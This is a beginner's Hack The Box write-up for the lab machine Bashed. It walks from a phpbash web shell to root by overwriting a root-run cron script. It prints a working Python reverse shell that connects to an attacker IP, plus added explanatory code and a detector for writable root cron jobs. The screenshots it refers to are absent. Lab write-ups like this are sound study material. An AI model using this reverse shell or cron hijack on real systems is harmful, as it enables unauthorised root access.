Bashed

This is my write-up for the machine Bashed on Hack The Box located at: https://app.hackthebox.com/machines/Bashed.

I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.

Basic nmap scan: nmap 10.10.10.68

We can see that port 80 (http) is open. I did a deeper nmap scan as well:

The only open port is still port 80. Going to the http site, we see the following:

I got a hint from this that phpbash is being used on the server and that I will have to exploit it. I ran gobuster to see what directories were available:

The uploads directory was empty, and I believe we will have to upload a shell there. The php directory had the following:

The file was empty when downloaded. Looking in the dev folder, I was able to find the shell:

I was then able to find the user.txt flag:

Running sudo -l, I was able to see the following:

I then realized I would have to upload a reverse shell to the system. There were two options in my mind: netcat and the pentestmonkey php-reverse-shell. I tried the pentestmonkey option first. I downloaded it from here, edited the IP address to be mine, hosted it from my machine with python3 -m http.server, and fetched it onto the target from there.

I then accessed the file on the website and was able to get a reverse shell using netcat:

After a while of searching for a way to upgrade the limited shell, I found this site, which shows the following:

Running that command got me out of the limited shell:

The sudo -l command from before shows us that the user we currently are can run commands as scriptmanager. A quick Google search showed me that the way to run a command as another user is sudo -u scriptmanager <command>. I wanted to get a reverse shell as the scriptmanager user:

I edited the payload from this website:

I got the same error as before:

When I ran linpeas (not shown in write-up, but uploaded the same way as the reverse shell), I noticed that there was a folder called scripts:

The code writes text to a file. At this point, I was actually lost. I found this write-up, which clarifies that I should have been focused on the cron jobs: the script in that folder is run by root from a cron job, so anything I write into it runs as root. I overwrote the original Python script (the one that writes test.txt) with a reverse shell by doing the following:

The content of the file was the following (from the write-up mentioned before):

import socket, subprocess, os

# connect back to the netcat listener waiting on the attacker machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.11", 8888))
# point stdin, stdout and stderr at the socket, then hand it to an interactive shell
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
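To make the dup2 trick in that payload concrete, here is an added example (it is not from the original page or from the write-up it cites) that does the same file-descriptor plumbing over a local socketpair instead of a connect() to an attacker host, so it runs offline on any POSIX system. The function name shell_over_socket, the use of os.fork, and the command passed in are my choices for the demonstration, not anything on the box.

```python
import os
import socket
import subprocess


def shell_over_socket(command, timeout=5.0):
    """Run /bin/sh -i with stdin, stdout and stderr all pointed at one socket end.

    The forked child plays the "victim" side: it duplicates its socket onto
    fds 0, 1 and 2 exactly like the cron payload, then execs an interactive
    shell. The parent plays the listener: it sends a command, reads whatever
    comes back, and returns it as text.
    """
    ours, theirs = socket.socketpair()          # stands in for the TCP connection
    pid = os.fork()
    if pid == 0:                                # child: victim side
        ours.close()
        fd = theirs.fileno()
        os.dup2(fd, 0)                          # stdin  <- socket
        os.dup2(fd, 1)                          # stdout -> socket
        os.dup2(fd, 2)                          # stderr -> socket (prompts and errors too)
        rc = subprocess.call(["/bin/sh", "-i"])
        os._exit(rc)                            # never return into the parent's code

    theirs.close()                              # parent: listener side
    ours.settimeout(timeout)
    ours.sendall((command + "\nexit\n").encode())
    chunks = []
    while True:
        try:
            data = ours.recv(4096)
        except socket.timeout:
            break
        if not data:                            # shell exited and the child closed its end
            break
        chunks.append(data)
    ours.close()
    os.waitpid(pid, 0)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(shell_over_socket("id; echo marker-$((6*7))"))
```

The three dup2 calls are the whole trick: the shell never knows it is talking to a socket, it just reads commands from fd 0 and writes to fds 1 and 2. Skipping the dup2 for fd 2 is a common mistake that leaves you with a shell whose error messages (and the "$ " prompt, which sh -i writes to stderr) go to the original stderr on the victim instead of back to you.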

I was then able to get root (once the cron job fired, about a minute later) and the root flag:

Going back to see where my mistake was, I should have noticed this in the output of linpeas.sh:
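The check that linpeas does here, generalized, as an added example (not from the original page, from linpeas, or from the cited write-up): parse /etc/crontab-style lines, keep the jobs that run as root, and flag any script they execute that a given unprivileged user could write to or replace. The crontab lines and the scripts directory are constructed inside demo() rather than copied from the box, and uid/gid 65534 stands in for the low-privilege user; the function names are mine.

```python
import os
import re
import stat
import tempfile

# /etc/crontab format: five time fields (or an @reboot-style keyword), then the
# user to run as, then the command. Per-user crontabs have no user column.
CRON_LINE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # variable assignment such as PATH=...
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(1), m.group(2)))
    return jobs


def writable_by(path, uid, gids):
    """True if a user with this uid and these gids could write to path."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def find_hijackable_root_jobs(jobs, uid, gids):
    """Flag root cron jobs whose script, or the directory holding it, the user can write."""
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        for token in command.replace(";", " ").split():
            if not token.startswith("/"):
                continue
            if os.path.isfile(token):
                if writable_by(token, uid, gids):
                    findings.append((token, "file writable", command))
                elif writable_by(os.path.dirname(token), uid, gids):
                    findings.append((token, "directory writable", command))
            elif os.path.isdir(token) and writable_by(token, uid, gids):
                # e.g. "cd /scripts; for f in *.py ..." lets us drop in a new script
                findings.append((token, "directory writable", command))
    return findings


def demo():
    """Constructed scenario, not the real box: a scripts directory with one
    world-writable and one read-only script, and a crontab that runs both as root."""
    base = tempfile.mkdtemp()
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    os.chmod(scripts, 0o755)
    loose = os.path.join(scripts, "test.py")
    tight = os.path.join(scripts, "backup.py")
    for path in (loose, tight):
        with open(path, "w") as f:
            f.write("print('hello')\n")
    os.chmod(loose, 0o666)                  # anyone can overwrite it
    os.chmod(tight, 0o644)
    crontab = (
        "# constructed /etc/crontab\n"
        "PATH=/usr/local/bin:/usr/bin:/bin\n"
        f"* * * * * root python {loose}\n"
        f"0 3 * * * root python {tight}\n"
        f"0 4 * * * www-data python {loose}\n"   # not root, so not interesting
    )
    jobs = parse_system_crontab(crontab)
    # uid/gid 65534 (nobody) stands in for an unprivileged user who owns none of this
    return find_hijackable_root_jobs(jobs, uid=65534, gids={65534})


if __name__ == "__main__":
    for path, why, command in demo():
        print(f"{why}: {path}  (root runs: {command})")
```

On a real host you would feed it /etc/crontab plus the files under /etc/cron.d, and pass os.getuid() and os.getgroups() for the account you currently have (here, scriptmanager). The directory check matters as much as the file check: a root job that globs or cd's into a directory you can write to is just as hijackable as one whose script you can edit, even if every existing file in it is read-only.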
